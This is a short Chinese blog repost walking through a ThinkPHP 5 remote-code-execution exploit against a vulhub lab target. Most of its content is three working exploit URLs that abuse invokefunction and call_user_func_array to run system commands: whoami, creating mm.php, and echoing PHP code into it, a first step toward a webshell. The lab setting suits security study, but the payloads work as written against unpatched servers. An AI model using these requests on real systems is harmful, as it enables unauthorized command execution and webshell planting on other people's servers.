社区首页 Pytorch kaggle方案总结
人工智能 大数据 竞赛 后端 前端 程序开发 分享探索
0
0


overfit同步小助手

2023-08-07 23:08:02

thinkphp 5-rce(rce漏洞getshell)

vulhub靶场

http://xxxxx:8080/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

验证漏洞

linux系统,可以用touch命令创建文件

http://xxxxx:8080/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=**touch mm.php**

再用echo写入一句话

http://xxxxx:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=**echo <?php phpinfo();?> >> mm.php**

查看写入成功

标签: 安全 web安全 php

本文转载自: https://blog.csdn.net/weixin_51692662/article/details/127673160
版权归原作者 安全~小菜鸡 所有, 如有侵权,请联系我们删除。

发表评论

登录后发布评论

“thinkphp 5-rce(rce漏洞getshell)”的评论:

还没有评论
关于作者
...
overfit同步小助手
文章同步
相关阅读

网络安全法-网络运行安全

使用selenium/drissionpage时如何阻止chrome自动跳转http到https

docker desktop 里部署的Open WebUI 管理员密码忘记了的处理方法

在ubuntu20.04中搭建onsite比赛运行环境

利用开源的低代码表单设计器FcDesigner高效管理和渲染复杂表单结构

Kafka学习笔记

【前端】浏览器输入url到页面呈现发生了什么?

文章导航